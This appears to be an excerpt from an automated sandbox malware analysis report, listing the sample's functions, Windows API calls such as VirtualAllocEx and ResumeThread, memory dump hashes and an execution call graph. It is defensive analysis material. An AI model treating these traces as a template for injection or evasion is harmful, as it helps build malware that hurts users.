                                                    • Source File: 00000009.00000002.2121813768.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_7790000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID: PpTZ
                                                    • API String ID: 4275171209-3956381780
                                                    • Opcode ID: af93b3b09451f037ed2cc05786770a87f07ffb39b35e7b7b12fd824f4429ee7e
                                                    • Instruction ID: 67820956345c900b6fb12619af012e0bdaf3b386678035dc56c63287ca3ef061
                                                    • Opcode Fuzzy Hash: af93b3b09451f037ed2cc05786770a87f07ffb39b35e7b7b12fd824f4429ee7e
                                                    • Instruction Fuzzy Hash: 0F1129B19012499FCF10DFA9D445AEEBFF5EF88320F24881AD519A7250C7799945CFA0
                                                    Function 0758DA10 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0758DA83
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121699449.0000000007580000.00000040.00000800.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_7580000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: ProtectVirtual
                                                    • String ID: PpTZ
                                                    • API String ID: 544645111-3956381780
                                                    • Opcode ID: d741edb6471af343330acfdc33ca8b73b1a77750df877ccef72afabd9933d537
                                                    • Instruction ID: 168061cb8ffb601cb5fd3e7ff421ec1b98151b6aa22d153150e585966aa522cd
                                                    • Opcode Fuzzy Hash: d741edb6471af343330acfdc33ca8b73b1a77750df877ccef72afabd9933d537
                                                    • Instruction Fuzzy Hash: 3F21D3B59002499FCB10DF9AC484BDEFBF4FB48320F10842AE958A7250D779A544CFA1
                                                    Function 0779A4B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0779A51E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121813768.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_7790000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID: PpTZ
                                                    • API String ID: 4275171209-3956381780
                                                    • Opcode ID: c0fe49fd9b3835ae92413a6a7b37765d8303ecbe5d6bce7578d134c014971510
                                                    • Instruction ID: 400d11bf3efcda1c227281f45889e1f42c7cd9d09da27637cf3c04fa0d3d19cd
                                                    • Opcode Fuzzy Hash: c0fe49fd9b3835ae92413a6a7b37765d8303ecbe5d6bce7578d134c014971510
                                                    • Instruction Fuzzy Hash: 931126B19012499FCB10DFAAD844AEEBFF5EF88310F108819E519A7250CB79A940CFA0
                                                    Function 07799AE0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 51threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ResumeThread.KERNELBASE(?), ref: 07799B4A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121813768.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_7790000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID: PpTZ
                                                    • API String ID: 947044025-3956381780
                                                    • Opcode ID: 870bc005b725a05df3a7bf03ec8bd67131e7fa9aabff98376bf38e501ddfecd7
                                                    • Instruction ID: e0cb4e629b41ab794391b760fde06bfb02ae1806b289bc636b826e3a8d1c9516
                                                    • Opcode Fuzzy Hash: 870bc005b725a05df3a7bf03ec8bd67131e7fa9aabff98376bf38e501ddfecd7
                                                    • Instruction Fuzzy Hash: ED1149B1D002498EDB20DFAAC445BEEFFF5EF89320F208829C519A7240C779A545CFA4
                                                    Function 07799AE8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ResumeThread.KERNELBASE(?), ref: 07799B4A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121813768.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_7790000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID: PpTZ
                                                    • API String ID: 947044025-3956381780
                                                    • Opcode ID: 1389a22938fb294300bef63278171b49308d5d2341cda6e8d0111ca96e1bbd7a
                                                    • Instruction ID: 6cb38d127d85bc3db37b28083b3a72ebb87deba187a3b4a8f9fa9565fc7687da
                                                    • Opcode Fuzzy Hash: 1389a22938fb294300bef63278171b49308d5d2341cda6e8d0111ca96e1bbd7a
                                                    • Instruction Fuzzy Hash: E0113AB1D002498FDB10DFAAC4457EEFBF5EF89724F208829D519A7240CB79A544CFA4
                                                    Function 02C2B4E0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 02C2B546
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2114141091.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_2c20000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID: PpTZ
                                                    • API String ID: 4139908857-3956381780
                                                    • Opcode ID: 79e435a10dccbdd5bda05b459158dd1d1cb7b7d2a3e9f2f897f5780c3b4cba2f
                                                    • Instruction ID: 22ccafe02fdf8359ef6d6bff607053dbfc760a6dfbce990d01d80d45cd90e93d
                                                    • Opcode Fuzzy Hash: 79e435a10dccbdd5bda05b459158dd1d1cb7b7d2a3e9f2f897f5780c3b4cba2f
                                                    • Instruction Fuzzy Hash: 64110FB5C002498FCB10DF9AC444B9EFBF8AF88314F10842AD428A7200C379A645CFA1
                                                    Function 07799CE0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 0779D9F5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121813768.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_7790000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: MessagePost
                                                    • String ID: PpTZ
                                                    • API String ID: 410705778-3956381780
                                                    • Opcode ID: a230b215c1d0521fafad1893029e50c5d681f561ac62e9ea9f34c4aed3c166ea
                                                    • Instruction ID: f0651e5deba40e3f5d118f0a9f71804f7c53a47edbbb86cd2cfcd24e5d072b3c
                                                    • Opcode Fuzzy Hash: a230b215c1d0521fafad1893029e50c5d681f561ac62e9ea9f34c4aed3c166ea
                                                    • Instruction Fuzzy Hash: 231103B5900349DFCB20DF9AD445BEEFBF8EB49320F108859E518A7200C379A944CFA1
                                                    Function 02C2B4DD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 02C2B546
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2114141091.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_2c20000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID: PpTZ
                                                    • API String ID: 4139908857-3956381780
                                                    • Opcode ID: c78cabfe3a488c5230775260bcb448ef9a3f7f4ba849dc044345884406e2918f
                                                    • Instruction ID: b4a90343b32e8f1bab59bd1808ad9cfd71b57e06750edb86b3d1d4cba2e13538
                                                    • Opcode Fuzzy Hash: c78cabfe3a488c5230775260bcb448ef9a3f7f4ba849dc044345884406e2918f
                                                    • Instruction Fuzzy Hash: F81110B6C002598FCB10CF9AC544BDEFBF8AF88314F10842AC428B7200C379A645CFA0
                                                    Function 0779D993 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 0779D9F5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121813768.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_7790000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: MessagePost
                                                    • String ID: PpTZ
                                                    • API String ID: 410705778-3956381780
                                                    • Opcode ID: 67497dcb561e4806ad93fc1a5bc7739698f2a5cdd0139f23c756bae6653e5177
                                                    • Instruction ID: 71031c9788c786357ac4355b050222e78deb645db02d6548cc7ca1bf7f5590c7
                                                    • Opcode Fuzzy Hash: 67497dcb561e4806ad93fc1a5bc7739698f2a5cdd0139f23c756bae6653e5177
                                                    • Instruction Fuzzy Hash: B51106B58003899FDB20DFA9D485BEEFFF4EB49314F108859D558A3200C379A944CFA1
                                                    Function 060A03B9 Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSystemMetrics.USER32(00000006), ref: 060A0378
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2120791871.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_60a0000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: MetricsSystem
                                                    • String ID:
                                                    • API String ID: 4116985748-0
                                                    • Opcode ID: 7cc2c902918e7f6e2a0b380b52ab9c36a93ee84ac43a94c9b6621f49de79bfc8
                                                    • Instruction ID: 4f876d186a7ce0c1a270773b2fe1ca5d2150964f0d06cbfe6adf51db78055c71
                                                    • Opcode Fuzzy Hash: 7cc2c902918e7f6e2a0b380b52ab9c36a93ee84ac43a94c9b6621f49de79bfc8
                                                    • Instruction Fuzzy Hash: 92417AB1A50B098FD7B4CFA8D04575ABBF5FB45284F044E2AD0ABCB600C770E844CB91
                                                    Function 0109D36C Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2111074296.000000000109D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0109D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_109d000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 859f3c3ff8e9f367185b3e97b0500378fe6efece2b75c971edb297f53694bb06
                                                    • Instruction ID: e69b1a50c38c908a8f20d53da6b95ace7661ee74bd7f1ccd0470f843203c467f
                                                    • Opcode Fuzzy Hash: 859f3c3ff8e9f367185b3e97b0500378fe6efece2b75c971edb297f53694bb06
                                                    • Instruction Fuzzy Hash: 36216471580200DFCF01CFA8C9D0B26BFA5FB88314F20C5ADE9890B292C73AD846DB61
                                                    Function 0109D1B4 Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2111074296.000000000109D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0109D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_109d000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 036f7966b26bd1c43b74be2b3e683ccb66ebd4042e5cc881c330b314ef821944
                                                    • Instruction ID: cae5994cd18e92f74c40cb9962b84a74b7b7a1f85c9d6fa6c62841c7bdfccf80
                                                    • Opcode Fuzzy Hash: 036f7966b26bd1c43b74be2b3e683ccb66ebd4042e5cc881c330b314ef821944
                                                    • Instruction Fuzzy Hash: B3212271584300AFCF05CFA8C5D0B2ABBA5FB94324F20C5EDE8890B252C33AD406DB61
                                                    Function 0109D1AF Relevance: .1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2111074296.000000000109D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0109D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_109d000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                    • Instruction ID: 29ac5e4c62e372f254b47a260bf70b6dcfc941a5e8daedf973c5e6ada4e4bb4e
                                                    • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                    • Instruction Fuzzy Hash: A911DD75544280CFDB02CF54D5D4B15BFA1FB84324F24C6EAD8894B256C33AD40ADBA2
                                                    Function 0109D367 Relevance: .1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2111074296.000000000109D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0109D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_109d000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                    • Instruction ID: 8aeef96ffde3c2895ac675cac463a1df99d1646c0633fcb9654d554dfbcfa60a
                                                    • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                    • Instruction Fuzzy Hash: A111EB75544280CFCB02CF58D5D4B15BFA1FB88318F24C6A9D9894B292C33AE44ADB62

                                                    Non-executed Functions

                                                    Function 060AA8AA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSystemMetrics.USER32(00000022), ref: 060AA906
                                                    • GetSystemMetrics.USER32(00000023), ref: 060AA940
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2120791871.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_60a0000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: MetricsSystem
                                                    • String ID: PpTZ
                                                    • API String ID: 4116985748-3956381780
                                                    • Opcode ID: b2d5ec9f230ee3bd3898286ab6c6a69f174a8d49e57cf77f69386861eb7ec81c
                                                    • Instruction ID: 8a532af4936c2ebae0a500749ba26ae82ffe9a868183efe359c178f7cb678ccd
                                                    • Opcode Fuzzy Hash: b2d5ec9f230ee3bd3898286ab6c6a69f174a8d49e57cf77f69386861eb7ec81c
                                                    • Instruction Fuzzy Hash: 7D2142B0D04389CFDB618FA9C5497EEBFF0EB09354F24844AD158A7291C3B95988CBA1
                                                    Function 060AA7CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSystemMetrics.USER32(0000003B), ref: 060AA82E
                                                    • GetSystemMetrics.USER32(0000003C), ref: 060AA868
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2120791871.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_60a0000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: MetricsSystem
                                                    • String ID: PpTZ
                                                    • API String ID: 4116985748-3956381780
                                                    • Opcode ID: 9b2f508aef24498116ca5a3da4dbc3c3afee84b2bbdce0728fd46aa921afda1d
                                                    • Instruction ID: baffd5366f4ead549fbfdcf2c25d1ccccb46766182b2f9c485f4cd9f2d5f14c9
                                                    • Opcode Fuzzy Hash: 9b2f508aef24498116ca5a3da4dbc3c3afee84b2bbdce0728fd46aa921afda1d
                                                    • Instruction Fuzzy Hash: D62142B4D003898EDB21CFA9C4497EEBFF4AB09314F24845AD559A7281C3B86546CFA1
                                                    Function 060A02E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSystemMetrics.USER32(00000005), ref: 060A033E
                                                    • GetSystemMetrics.USER32(00000006), ref: 060A0378
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2120791871.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_60a0000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: MetricsSystem
                                                    • String ID: PpTZ
                                                    • API String ID: 4116985748-3956381780
                                                    • Opcode ID: 65f853460e42ad214cc474636a6191755cf58af854af6eedec5a838072709376
                                                    • Instruction ID: 7ae5598e2bbff306044772fbc47435207f78a38878f3f098f35f289b2d07f736
                                                    • Opcode Fuzzy Hash: 65f853460e42ad214cc474636a6191755cf58af854af6eedec5a838072709376
                                                    • Instruction Fuzzy Hash: 6C2134B1D003498FDB10CF99C449B9EBFF8EB08354F248419D559A7340C3B9A584CFA1
                                                    Function 060AA7E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSystemMetrics.USER32(0000003B), ref: 060AA82E
                                                    • GetSystemMetrics.USER32(0000003C), ref: 060AA868
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2120791871.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_60a0000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: MetricsSystem
                                                    • String ID: PpTZ
                                                    • API String ID: 4116985748-3956381780
                                                    • Opcode ID: 7ee51301e400401bdaf590fd3d7fea7a0589cc98e5c4455fb70adf43f1facffe
                                                    • Instruction ID: 18eb85158a1ae7f8a656bf4f15cdb189ec6e58371983b276bcdbd6a2971bdb85
                                                    • Opcode Fuzzy Hash: 7ee51301e400401bdaf590fd3d7fea7a0589cc98e5c4455fb70adf43f1facffe
                                                    • Instruction Fuzzy Hash: C6212EB0E003498EDB20DF9AC4497AEBFF8EB08754F24841AD519A7380C3B86585CFA5
                                                    Function 060A02F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSystemMetrics.USER32(00000005), ref: 060A033E
                                                    • GetSystemMetrics.USER32(00000006), ref: 060A0378
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2120791871.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_60a0000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: MetricsSystem
                                                    • String ID: PpTZ
                                                    • API String ID: 4116985748-3956381780
                                                    • Opcode ID: 45c0ca7904f1e1782d58dc88fe325d920dda8b90819475928b78d797faee486f
                                                    • Instruction ID: f2a26cb4f0d19ccb04f4a3ccce496fb389c333300991fb785b719bb095d3934b
                                                    • Opcode Fuzzy Hash: 45c0ca7904f1e1782d58dc88fe325d920dda8b90819475928b78d797faee486f
                                                    • Instruction Fuzzy Hash: 41212EB1D003498FDB60DF9AC449BAEBFF8EB08354F24841AD559A7290C3B96584CFA5
                                                    Function 060AA8B8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSystemMetrics.USER32(00000022), ref: 060AA906
                                                    • GetSystemMetrics.USER32(00000023), ref: 060AA940
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2120791871.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_60a0000_eaJOpx.jbxd
                                                    Similarity
                                                    • API ID: MetricsSystem
                                                    • String ID: PpTZ
                                                    • API String ID: 4116985748-3956381780
                                                    • Opcode ID: 1877ce7bb6ee42076c220d6f192e5ca0de051e8f75518e7290c0e87a7cd43501
                                                    • Instruction ID: 557971305f4be970d29c5bb62a4fe7c9f2dfec419c361c6fefbc37aa2b59b8a5
                                                    • Opcode Fuzzy Hash: 1877ce7bb6ee42076c220d6f192e5ca0de051e8f75518e7290c0e87a7cd43501
                                                    • Instruction Fuzzy Hash: CD212EB0E003098FDB60DF9AC5497AEFFF4EB08314F24841AD559A7280C3B96584CFA5

                                                    Execution Graph

                                                    Execution Coverage:0.8%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:2.6%
                                                    Total number of Nodes:464
                                                    Total number of Limit Nodes:19
                                                    execution_graph 47286 433b03 47295 433ca4 GetModuleHandleW 47286->47295 47288 433b0b 47289 433b41 47288->47289 47290 433b0f 47288->47290 47297 442680 28 API calls _Atexit 47289->47297 47292 433b1a 47290->47292 47296 442662 28 API calls _Atexit 47290->47296 47293 433b49 47295->47288 47296->47292 47297->47293 47298 446f53 GetLastError 47299 446f6c 47298->47299 47300 446f72 47298->47300 47324 447476 11 API calls 2 library calls 47299->47324 47305 446fc9 SetLastError 47300->47305 47317 448716 47300->47317 47304 446f8c 47325 446ad5 20 API calls _free 47304->47325 47306 446fd2 47305->47306 47309 446fa1 47309->47304 47311 446fa8 47309->47311 47310 446f92 47312 446fc0 SetLastError 47310->47312 47327 446d41 20 API calls _free 47311->47327 47312->47306 47314 446fb3 47328 446ad5 20 API calls _free 47314->47328 47316 446fb9 47316->47305 47316->47312 47322 448723 _strftime 47317->47322 47318 448763 47330 445364 20 API calls _free 47318->47330 47319 44874e RtlAllocateHeap 47320 446f84 47319->47320 47319->47322 47320->47304 47326 4474cc 11 API calls 2 library calls 47320->47326 47322->47318 47322->47319 47329 442210 7 API calls 2 library calls 47322->47329 47324->47300 47325->47310 47326->47309 47327->47314 47328->47316 47329->47322 47330->47320 47331 4047eb WaitForSingleObject 47332 404805 SetEvent CloseHandle 47331->47332 47333 40481c closesocket 47331->47333 47334 40489c 47332->47334 47335 404829 47333->47335 47336 40483f 47335->47336 47344 404ab1 83 API calls 47335->47344 47338 404851 WaitForSingleObject 47336->47338 47339 404892 SetEvent CloseHandle 47336->47339 47345 41dc25 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47338->47345 47339->47334 47341 404860 SetEvent WaitForSingleObject 47346 41dc25 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47341->47346 47343 404878 SetEvent CloseHandle CloseHandle 47343->47339 47344->47336 47345->47341 47346->47343 47347 4339ce 47348 4339da __FrameHandler3::FrameUnwindToState 47347->47348 47379 4336c3 47348->47379 47350 4339e1 47351 433b34 47350->47351 47354 433a0b 47350->47354 47675 433b54 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 47351->47675 47353 433b3b 47666 4426ce 47353->47666 47363 433a4a ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 47354->47363 47669 4434e1 5 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 47354->47669 47359 433a24 47361 433a2a 47359->47361 47670 443485 5 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 47359->47670 47370 433aab 47363->47370 47671 43ee04 35 API calls 3 library calls 47363->47671 47390 433c6e 47370->47390 47373 433acd 47373->47353 47374 433ad1 47373->47374 47375 433ada 47374->47375 47673 442671 28 API calls _Atexit 47374->47673 47674 433852 13 API calls 2 library calls 47375->47674 47378 433ae2 47378->47361 47380 4336cc 47379->47380 47677 433e1a IsProcessorFeaturePresent 47380->47677 47382 4336d8 47678 4379fe 10 API calls 3 library calls 47382->47678 47384 4336dd 47389 4336e1 47384->47389 47679 44336e 47384->47679 47387 4336f8 47387->47350 47389->47350 47695 436060 47390->47695 47392 433c81 GetStartupInfoW 47393 433ab1 47392->47393 47394 443432 47393->47394 47696 44ddd9 47394->47696 47396 44343b 47397 433aba 47396->47397 47700 44e0e3 35 API calls 47396->47700 47399 40d767 47397->47399 47702 41bcf3 LoadLibraryA GetProcAddress 47399->47702 47401 40d783 GetModuleFileNameW 47707 40e168 47401->47707 47403 40d79f 47722 401fbd 28 API calls 47403->47722 47405 40d7ae 47723 401fbd 28 API calls 47405->47723 47407 40d7bd 47724 41afd3 28 API calls 47407->47724 47409 40d7c6 47725 40e8bd 11 API calls 47409->47725 47411 40d7cf 47726 401d8c 11 API calls 47411->47726 47413 40d7d8 47414 40d835 47413->47414 47415 40d7eb 47413->47415 47727 401d64 22 API calls 47414->47727 47747 40e986 111 API calls 47415->47747 47418 40d845 47728 401d64 22 API calls 47418->47728 47419 40d7fd 47748 401d64 22 API calls 47419->47748 47422 40d864 47729 404cbf 28 API calls 47422->47729 47424 40d809 47749 40e937 65 API calls 47424->47749 47425 40d873 47730 405ce6 28 API calls 47425->47730 47428 40d824 47750 40e155 65 API calls 47428->47750 47429 40d87f 47731 401eef 47429->47731 47432 40d88b 47735 401eea 47432->47735 47434 40d894 47436 401eea 11 API calls 47434->47436 47435 401eea 11 API calls 47437 40dc9f 47435->47437 47438 40d89d 47436->47438 47672 433ca4 GetModuleHandleW 47437->47672 47739 401d64 22 API calls 47438->47739 47440 40d8a6 47740 401ebd 28 API calls 47440->47740 47442 40d8b1 47741 401d64 22 API calls 47442->47741 47444 40d8ca 47742 401d64 22 API calls 47444->47742 47446 40d946 47464 40e134 47446->47464 47743 401d64 22 API calls 47446->47743 47447 40d8e5 47447->47446 47751 4085b4 28 API calls 47447->47751 47450 40d912 47451 401eef 11 API calls 47450->47451 47452 40d91e 47451->47452 47455 401eea 11 API calls 47452->47455 47453 40d9a4 47744 40bed7 47453->47744 47454 40d95d 47454->47453 47753 4124b7 RegOpenKeyExA RegQueryValueExA RegCloseKey 47454->47753 47456 40d927 47455->47456 47752 4124b7 RegOpenKeyExA RegQueryValueExA RegCloseKey 47456->47752 47458 40d9aa 47459 40d82d 47458->47459 47755 41a473 33 API calls 47458->47755 47459->47435 47463 40d9c5 47466 40da18 47463->47466 47756 40697b RegOpenKeyExA RegQueryValueExA RegCloseKey 47463->47756 47841 412902 30 API calls 47464->47841 47465 40d988 47465->47453 47754 412902 30 API calls 47465->47754 47761 401d64 22 API calls 47466->47761 47471 40e14a 47842 4112b5 64 API calls ___scrt_fastfail 47471->47842 47472 40da21 47480 40da32 47472->47480 47481 40da2d 47472->47481 47473 40d9e0 47475 40d9e4 47473->47475 47476 40d9ee 47473->47476 47757 40699d 30 API calls 47475->47757 47759 401d64 22 API calls 47476->47759 47763 401d64 22 API calls 47480->47763 47762 4069ba CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 47481->47762 47482 40d9e9 47758 4064d0 97 API calls 47482->47758 47486 40da3b 47764 41ae18 28 API calls 47486->47764 47488 40d9f7 47488->47466 47491 40da13 47488->47491 47489 40da46 47765 401e18 11 API calls 47489->47765 47760 4064d0 97 API calls 47491->47760 47492 40da51 47766 401e13 11 API calls 47492->47766 47495 40da5a 47767 401d64 22 API calls 47495->47767 47497 40da63 47768 401d64 22 API calls 47497->47768 47499 40da7d 47769 401d64 22 API calls 47499->47769 47501 40da97 47770 401d64 22 API calls 47501->47770 47503 40db22 47505 40db2c 47503->47505 47512 40dcaa ___scrt_fastfail 47503->47512 47504 40dab0 47504->47503 47771 401d64 22 API calls 47504->47771 47507 40db35 47505->47507 47513 40dbb1 47505->47513 47777 401d64 22 API calls 47507->47777 47509 40db3e 47778 401d64 22 API calls 47509->47778 47510 40dac5 _wcslen 47510->47503 47772 401d64 22 API calls 47510->47772 47788 41265d RegOpenKeyExA RegQueryValueExA RegCloseKey 47512->47788 47537 40dbac ___scrt_fastfail 47513->47537 47515 40db50 47779 401d64 22 API calls 47515->47779 47516 40dae0 47773 401d64 22 API calls 47516->47773 47520 40db62 47780 401d64 22 API calls 47520->47780 47521 40daf5 47774 40c89e 31 API calls 47521->47774 47522 40dcef 47789 401d64 22 API calls 47522->47789 47525 40db8b 47781 401d64 22 API calls 47525->47781 47526 40dd16 47790 401f66 28 API calls 47526->47790 47528 40db08 47775 401e18 11 API calls 47528->47775 47532 40db14 47776 401e13 11 API calls 47532->47776 47534 40db9c 47782 40bc67 45 API calls _wcslen 47534->47782 47535 40dd25 47791 4126d2 14 API calls 47535->47791 47536 40db1d 47536->47503 47537->47513 47783 4128a2 31 API calls 47537->47783 47541 40dc45 ctype 47784 401d64 22 API calls 47541->47784 47542 40dd3b 47792 401d64 22 API calls 47542->47792 47544 40dd47 47793 43a5f7 39 API calls _strftime 